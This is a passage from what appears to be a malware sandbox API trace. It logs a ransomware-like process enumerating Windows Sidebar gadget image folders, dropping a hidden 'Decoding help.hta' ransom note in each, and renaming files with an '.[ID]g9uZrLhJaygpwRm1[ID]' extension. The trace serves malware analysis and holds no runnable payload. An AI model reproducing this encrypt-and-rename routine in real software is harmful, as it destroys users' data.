(x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-4.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-4.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.304] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb76c32c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbb76c32c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb70f7dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb93, dwReserved0=0x0, dwReserved1=0x0, cFileName="combo-hover-left.png", cAlternateFileName="")) returned 1 [0061.305] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.305] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0061.305] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0061.305] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0061.305] lstrcmpiW (lpString1="Decoding help.hta", lpString2="combo-hover-left.png") returned 1 [0061.305] lstrlenW (lpString="combo-hover-left.png") returned 20 [0061.305] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.305] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0061.305] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="combo-hover-left.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png" [0061.305] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png" [0061.305] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-left.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-left.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.985] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb79248b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbb79248b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb70f7dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb45, dwReserved0=0x0, dwReserved1=0x0, cFileName="combo-hover-middle.png", cAlternateFileName="")) returned 1 Thread: id = 866 os_tid = 0xaa0 [0054.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*", lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8191f35e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8191f35e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5e30 [0056.137] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.137] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8191f35e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8191f35e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.137] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.137] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.137] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb950e673, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb950e673, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb7c4b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x42e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="back.png", cAlternateFileName="")) returned 1 [0056.588] lstrcpyW (in: lpString1=0x10f27290, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0056.588] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0056.588] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0056.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0xffffffff [0056.589] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9e0 [0058.036] WriteFile (in: hFile=0x9e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2951fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2951fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.037] CloseHandle (hObject=0x9e0) returned 1 [0058.037] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.037] lstrcmpiW (lpString1="Decoding help.hta", lpString2="back.png") returned 1 [0058.037] lstrlenW (lpString="back.png") returned 8 [0058.037] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0058.037] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0058.037] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="back.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png" [0058.037] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png" [0058.037] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.037] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.042] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb94e8514, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb94e8514, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb7c4b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6651, dwReserved0=0x0, dwReserved1=0x0, cFileName="back_lrg.png", cAlternateFileName="")) returned 1 [0059.042] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0059.042] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0059.042] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0059.042] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0059.042] lstrcmpiW (lpString1="Decoding help.hta", lpString2="back_lrg.png") returned 1 [0059.042] lstrlenW (lpString="back_lrg.png") returned 12 [0059.042] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0059.042] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0059.042] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="back_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png" [0059.042] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png" [0059.042] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back_lrg.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back_lrg.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.042] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7cbdcdc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb7cbdcdc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb7cbdcdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15a, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial.png", cAlternateFileName="")) returned 1 [0059.043] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0059.043] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0059.043] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0059.043] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0059.043] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dial.png") returned -1 [0059.043] lstrlenW (lpString="dial.png") returned 8 [0059.043] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0059.043] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0059.043] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dial.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png" [0059.043] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png" [0059.043] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.043] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.417] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb94e8514, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb94e8514, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb94d7b9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc91, dwReserved0=0x0, dwReserved1=0x0, cFileName="dialdot.png", cAlternateFileName="")) returned 1 [0059.417] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0059.417] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0059.417] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0059.417] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0059.417] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dialdot.png") returned -1 [0059.417] lstrlenW (lpString="dialdot.png") returned 11 [0059.417] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0059.417] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0059.417] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dialdot.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png" [0059.417] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png" [0059.417] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.417] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb950e673, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb950e673, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb94d7b9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfca, dwReserved0=0x0, dwReserved1=0x0, cFileName="dialdot_lrg.png", cAlternateFileName="")) returned 1 [0059.417] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0059.417] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0059.417] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0059.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0059.418] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dialdot_lrg.png") returned -1 [0059.418] lstrlenW (lpString="dialdot_lrg.png") returned 15 [0059.418] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0059.418] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0059.418] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dialdot_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png") 